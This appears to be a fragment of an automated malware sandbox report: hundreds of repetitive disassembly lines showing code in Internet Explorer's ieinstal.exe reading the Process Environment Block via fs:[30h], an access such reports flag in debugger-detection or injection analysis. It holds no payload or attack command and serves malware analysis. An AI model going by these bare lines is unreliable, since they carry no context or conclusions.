      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6D1FC9 mov eax, dword ptr fs:[00000030h]7_2_1E6D1FC9
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6D1FC9 mov eax, dword ptr fs:[00000030h]7_2_1E6D1FC9
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6D1FC9 mov eax, dword ptr fs:[00000030h]7_2_1E6D1FC9
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6D1FC9 mov eax, dword ptr fs:[00000030h]7_2_1E6D1FC9
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6D1FC9 mov eax, dword ptr fs:[00000030h]7_2_1E6D1FC9
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6D1FC9 mov eax, dword ptr fs:[00000030h]7_2_1E6D1FC9
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6D1FC9 mov eax, dword ptr fs:[00000030h]7_2_1E6D1FC9
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6D1FC9 mov eax, dword ptr fs:[00000030h]7_2_1E6D1FC9
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6D1FC9 mov eax, dword ptr fs:[00000030h]7_2_1E6D1FC9
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6D1FC9 mov eax, dword ptr fs:[00000030h]7_2_1E6D1FC9
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6D1FC9 mov eax, dword ptr fs:[00000030h]7_2_1E6D1FC9
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6D1FC9 mov eax, dword ptr fs:[00000030h]7_2_1E6D1FC9
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6CFFDC mov eax, dword ptr fs:[00000030h]7_2_1E6CFFDC
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6CFFDC mov eax, dword ptr fs:[00000030h]7_2_1E6CFFDC
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6CFFDC mov eax, dword ptr fs:[00000030h]7_2_1E6CFFDC
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6CFFDC mov ecx, dword ptr fs:[00000030h]7_2_1E6CFFDC
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6CFFDC mov eax, dword ptr fs:[00000030h]7_2_1E6CFFDC
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6CFFDC mov eax, dword ptr fs:[00000030h]7_2_1E6CFFDC
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E649FD0 mov eax, dword ptr fs:[00000030h]7_2_1E649FD0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E651FAA mov eax, dword ptr fs:[00000030h]7_2_1E651FAA
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E654FB6 mov eax, dword ptr fs:[00000030h]7_2_1E654FB6
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E688FBC mov eax, dword ptr fs:[00000030h]7_2_1E688FBC
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E67CFB0 mov eax, dword ptr fs:[00000030h]7_2_1E67CFB0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E67CFB0 mov eax, dword ptr fs:[00000030h]7_2_1E67CFB0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6D8F8B mov eax, dword ptr fs:[00000030h]7_2_1E6D8F8B
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6D8F8B mov eax, dword ptr fs:[00000030h]7_2_1E6D8F8B
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6D8F8B mov eax, dword ptr fs:[00000030h]7_2_1E6D8F8B
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E67BF93 mov eax, dword ptr fs:[00000030h]7_2_1E67BF93
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E660F90 mov eax, dword ptr fs:[00000030h]7_2_1E660F90
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E660F90 mov ecx, dword ptr fs:[00000030h]7_2_1E660F90
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E660F90 mov eax, dword ptr fs:[00000030h]7_2_1E660F90
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E660F90 mov eax, dword ptr fs:[00000030h]7_2_1E660F90
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E660F90 mov eax, dword ptr fs:[00000030h]7_2_1E660F90
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E660F90 mov eax, dword ptr fs:[00000030h]7_2_1E660F90
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E660F90 mov eax, dword ptr fs:[00000030h]7_2_1E660F90
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E660F90 mov eax, dword ptr fs:[00000030h]7_2_1E660F90
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E660F90 mov eax, dword ptr fs:[00000030h]7_2_1E660F90
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E660F90 mov eax, dword ptr fs:[00000030h]7_2_1E660F90
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E660F90 mov eax, dword ptr fs:[00000030h]7_2_1E660F90
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E660F90 mov eax, dword ptr fs:[00000030h]7_2_1E660F90
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E660F90 mov eax, dword ptr fs:[00000030h]7_2_1E660F90
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E663C60 mov eax, dword ptr fs:[00000030h]7_2_1E663C60
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E663C60 mov eax, dword ptr fs:[00000030h]7_2_1E663C60
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E663C60 mov eax, dword ptr fs:[00000030h]7_2_1E663C60
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E663C60 mov eax, dword ptr fs:[00000030h]7_2_1E663C60
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E663C60 mov ecx, dword ptr fs:[00000030h]7_2_1E663C60
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E663C60 mov ecx, dword ptr fs:[00000030h]7_2_1E663C60
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E663C60 mov eax, dword ptr fs:[00000030h]7_2_1E663C60
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E663C60 mov ecx, dword ptr fs:[00000030h]7_2_1E663C60
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E663C60 mov ecx, dword ptr fs:[00000030h]7_2_1E663C60
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E663C60 mov eax, dword ptr fs:[00000030h]7_2_1E663C60
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E663C60 mov ecx, dword ptr fs:[00000030h]7_2_1E663C60
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E663C60 mov ecx, dword ptr fs:[00000030h]7_2_1E663C60
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E663C60 mov eax, dword ptr fs:[00000030h]7_2_1E663C60
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E663C60 mov eax, dword ptr fs:[00000030h]7_2_1E663C60
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E663C60 mov eax, dword ptr fs:[00000030h]7_2_1E663C60
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E663C60 mov eax, dword ptr fs:[00000030h]7_2_1E663C60
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E663C60 mov eax, dword ptr fs:[00000030h]7_2_1E663C60
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E663C60 mov eax, dword ptr fs:[00000030h]7_2_1E663C60
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E663C60 mov eax, dword ptr fs:[00000030h]7_2_1E663C60
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E663C60 mov eax, dword ptr fs:[00000030h]7_2_1E663C60
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E68BC6E mov eax, dword ptr fs:[00000030h]7_2_1E68BC6E
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E68BC6E mov eax, dword ptr fs:[00000030h]7_2_1E68BC6E
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E64CC68 mov eax, dword ptr fs:[00000030h]7_2_1E64CC68
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E650C79 mov eax, dword ptr fs:[00000030h]7_2_1E650C79
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E650C79 mov eax, dword ptr fs:[00000030h]7_2_1E650C79
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E650C79 mov eax, dword ptr fs:[00000030h]7_2_1E650C79
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E658C79 mov eax, dword ptr fs:[00000030h]7_2_1E658C79
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E658C79 mov eax, dword ptr fs:[00000030h]7_2_1E658C79
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E658C79 mov eax, dword ptr fs:[00000030h]7_2_1E658C79
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E658C79 mov eax, dword ptr fs:[00000030h]7_2_1E658C79
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E658C79 mov eax, dword ptr fs:[00000030h]7_2_1E658C79
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E64DC40 mov eax, dword ptr fs:[00000030h]7_2_1E64DC40
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E663C40 mov eax, dword ptr fs:[00000030h]7_2_1E663C40
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E724C59 mov eax, dword ptr fs:[00000030h]7_2_1E724C59
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6D3C57 mov eax, dword ptr fs:[00000030h]7_2_1E6D3C57
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E663C20 mov eax, dword ptr fs:[00000030h]7_2_1E663C20
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E66AC20 mov eax, dword ptr fs:[00000030h]7_2_1E66AC20
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E66AC20 mov eax, dword ptr fs:[00000030h]7_2_1E66AC20
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E66AC20 mov eax, dword ptr fs:[00000030h]7_2_1E66AC20
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E715C38 mov eax, dword ptr fs:[00000030h]7_2_1E715C38
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E715C38 mov ecx, dword ptr fs:[00000030h]7_2_1E715C38
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E684C3D mov eax, dword ptr fs:[00000030h]7_2_1E684C3D
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E648C3D mov eax, dword ptr fs:[00000030h]7_2_1E648C3D
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E682C10 mov eax, dword ptr fs:[00000030h]7_2_1E682C10
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E682C10 mov eax, dword ptr fs:[00000030h]7_2_1E682C10
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E682C10 mov eax, dword ptr fs:[00000030h]7_2_1E682C10
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E682C10 mov eax, dword ptr fs:[00000030h]7_2_1E682C10
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6D0CEE mov eax, dword ptr fs:[00000030h]7_2_1E6D0CEE
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E67ECF3 mov eax, dword ptr fs:[00000030h]7_2_1E67ECF3
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E67ECF3 mov eax, dword ptr fs:[00000030h]7_2_1E67ECF3
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E647CF1 mov eax, dword ptr fs:[00000030h]7_2_1E647CF1
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E653CF0 mov eax, dword ptr fs:[00000030h]7_2_1E653CF0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E653CF0 mov eax, dword ptr fs:[00000030h]7_2_1E653CF0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6CCCF0 mov ecx, dword ptr fs:[00000030h]7_2_1E6CCCF0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E724CD2 mov eax, dword ptr fs:[00000030h]7_2_1E724CD2
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E646CC0 mov eax, dword ptr fs:[00000030h]7_2_1E646CC0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E646CC0 mov eax, dword ptr fs:[00000030h]7_2_1E646CC0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E646CC0 mov eax, dword ptr fs:[00000030h]7_2_1E646CC0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E689CCF mov eax, dword ptr fs:[00000030h]7_2_1E689CCF
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E686CC0 mov eax, dword ptr fs:[00000030h]7_2_1E686CC0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E65FCC9 mov eax, dword ptr fs:[00000030h]7_2_1E65FCC9
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E66DCD1 mov eax, dword ptr fs:[00000030h]7_2_1E66DCD1
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E66DCD1 mov eax, dword ptr fs:[00000030h]7_2_1E66DCD1
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E66DCD1 mov eax, dword ptr fs:[00000030h]7_2_1E66DCD1
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E678CDF mov eax, dword ptr fs:[00000030h]7_2_1E678CDF
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E678CDF mov eax, dword ptr fs:[00000030h]7_2_1E678CDF
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E68CCD1 mov ecx, dword ptr fs:[00000030h]7_2_1E68CCD1
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E68CCD1 mov eax, dword ptr fs:[00000030h]7_2_1E68CCD1
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E68CCD1 mov eax, dword ptr fs:[00000030h]7_2_1E68CCD1
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6E3CD4 mov eax, dword ptr fs:[00000030h]7_2_1E6E3CD4
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6E3CD4 mov eax, dword ptr fs:[00000030h]7_2_1E6E3CD4
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6E3CD4 mov ecx, dword ptr fs:[00000030h]7_2_1E6E3CD4
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6E3CD4 mov eax, dword ptr fs:[00000030h]7_2_1E6E3CD4
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6E3CD4 mov eax, dword ptr fs:[00000030h]7_2_1E6E3CD4
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E647C85 mov eax, dword ptr fs:[00000030h]7_2_1E647C85
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E647C85 mov eax, dword ptr fs:[00000030h]7_2_1E647C85
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E647C85 mov eax, dword ptr fs:[00000030h]7_2_1E647C85
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E647C85 mov eax, dword ptr fs:[00000030h]7_2_1E647C85
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E647C85 mov eax, dword ptr fs:[00000030h]7_2_1E647C85
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E70FC95 mov eax, dword ptr fs:[00000030h]7_2_1E70FC95
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6D3C80 mov ecx, dword ptr fs:[00000030h]7_2_1E6D3C80
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E657C95 mov eax, dword ptr fs:[00000030h]7_2_1E657C95
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E657C95 mov eax, dword ptr fs:[00000030h]7_2_1E657C95
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6F9C98 mov ecx, dword ptr fs:[00000030h]7_2_1E6F9C98
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6F9C98 mov eax, dword ptr fs:[00000030h]7_2_1E6F9C98
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6F9C98 mov eax, dword ptr fs:[00000030h]7_2_1E6F9C98
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6F9C98 mov eax, dword ptr fs:[00000030h]7_2_1E6F9C98
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E665D60 mov eax, dword ptr fs:[00000030h]7_2_1E665D60
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E725D65 mov eax, dword ptr fs:[00000030h]7_2_1E725D65
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E68BD71 mov eax, dword ptr fs:[00000030h]7_2_1E68BD71
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E68BD71 mov eax, dword ptr fs:[00000030h]7_2_1E68BD71
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E649D46 mov eax, dword ptr fs:[00000030h]7_2_1E649D46
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E649D46 mov eax, dword ptr fs:[00000030h]7_2_1E649D46
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E649D46 mov ecx, dword ptr fs:[00000030h]7_2_1E649D46
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E66DD4D mov eax, dword ptr fs:[00000030h]7_2_1E66DD4D
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E66DD4D mov eax, dword ptr fs:[00000030h]7_2_1E66DD4D
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E66DD4D mov eax, dword ptr fs:[00000030h]7_2_1E66DD4D
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6CCD40 mov eax, dword ptr fs:[00000030h]7_2_1E6CCD40
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6CCD40 mov eax, dword ptr fs:[00000030h]7_2_1E6CCD40
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E715D43 mov eax, dword ptr fs:[00000030h]7_2_1E715D43
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E715D43 mov eax, dword ptr fs:[00000030h]7_2_1E715D43
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6D1D5E mov eax, dword ptr fs:[00000030h]7_2_1E6D1D5E
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E651D50 mov eax, dword ptr fs:[00000030h]7_2_1E651D50
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E651D50 mov eax, dword ptr fs:[00000030h]7_2_1E651D50
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E724D4B mov eax, dword ptr fs:[00000030h]7_2_1E724D4B
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E64FD20 mov eax, dword ptr fs:[00000030h]7_2_1E64FD20
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E67AD20 mov eax, dword ptr fs:[00000030h]7_2_1E67AD20
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E67AD20 mov eax, dword ptr fs:[00000030h]7_2_1E67AD20
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E67AD20 mov eax, dword ptr fs:[00000030h]7_2_1E67AD20
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E67AD20 mov ecx, dword ptr fs:[00000030h]7_2_1E67AD20
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E67AD20 mov eax, dword ptr fs:[00000030h]7_2_1E67AD20
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E67AD20 mov eax, dword ptr fs:[00000030h]7_2_1E67AD20
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E67AD20 mov eax, dword ptr fs:[00000030h]7_2_1E67AD20
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E67AD20 mov eax, dword ptr fs:[00000030h]7_2_1E67AD20
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E67AD20 mov eax, dword ptr fs:[00000030h]7_2_1E67AD20
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E67AD20 mov eax, dword ptr fs:[00000030h]7_2_1E67AD20
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E700D24 mov eax, dword ptr fs:[00000030h]7_2_1E700D24
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E700D24 mov eax, dword ptr fs:[00000030h]7_2_1E700D24
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E700D24 mov eax, dword ptr fs:[00000030h]7_2_1E700D24
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E700D24 mov eax, dword ptr fs:[00000030h]7_2_1E700D24
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6E8D0A mov eax, dword ptr fs:[00000030h]7_2_1E6E8D0A
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E65AD00 mov eax, dword ptr fs:[00000030h]7_2_1E65AD00
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E65AD00 mov eax, dword ptr fs:[00000030h]7_2_1E65AD00
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E65AD00 mov eax, dword ptr fs:[00000030h]7_2_1E65AD00
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E65AD00 mov eax, dword ptr fs:[00000030h]7_2_1E65AD00
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E65AD00 mov eax, dword ptr fs:[00000030h]7_2_1E65AD00
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E65AD00 mov eax, dword ptr fs:[00000030h]7_2_1E65AD00
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E670D01 mov eax, dword ptr fs:[00000030h]7_2_1E670D01
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E67CD10 mov eax, dword ptr fs:[00000030h]7_2_1E67CD10
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E67CD10 mov ecx, dword ptr fs:[00000030h]7_2_1E67CD10
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E70BD08 mov eax, dword ptr fs:[00000030h]7_2_1E70BD08
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E70BD08 mov eax, dword ptr fs:[00000030h]7_2_1E70BD08
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E65BDE0 mov eax, dword ptr fs:[00000030h]7_2_1E65BDE0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E65BDE0 mov eax, dword ptr fs:[00000030h]7_2_1E65BDE0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E65BDE0 mov eax, dword ptr fs:[00000030h]7_2_1E65BDE0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E65BDE0 mov eax, dword ptr fs:[00000030h]7_2_1E65BDE0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E65BDE0 mov eax, dword ptr fs:[00000030h]7_2_1E65BDE0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E65BDE0 mov eax, dword ptr fs:[00000030h]7_2_1E65BDE0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E65BDE0 mov eax, dword ptr fs:[00000030h]7_2_1E65BDE0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E65BDE0 mov eax, dword ptr fs:[00000030h]7_2_1E65BDE0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E67FDE0 mov eax, dword ptr fs:[00000030h]7_2_1E67FDE0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E71CDEB mov eax, dword ptr fs:[00000030h]7_2_1E71CDEB
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E71CDEB mov eax, dword ptr fs:[00000030h]7_2_1E71CDEB
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6FFDF4 mov eax, dword ptr fs:[00000030h]7_2_1E6FFDF4
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6FFDF4 mov eax, dword ptr fs:[00000030h]7_2_1E6FFDF4
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6FFDF4 mov eax, dword ptr fs:[00000030h]7_2_1E6FFDF4
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6FFDF4 mov eax, dword ptr fs:[00000030h]7_2_1E6FFDF4
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6FFDF4 mov eax, dword ptr fs:[00000030h]7_2_1E6FFDF4
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6FFDF4 mov eax, dword ptr fs:[00000030h]7_2_1E6FFDF4
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6FFDF4 mov eax, dword ptr fs:[00000030h]7_2_1E6FFDF4
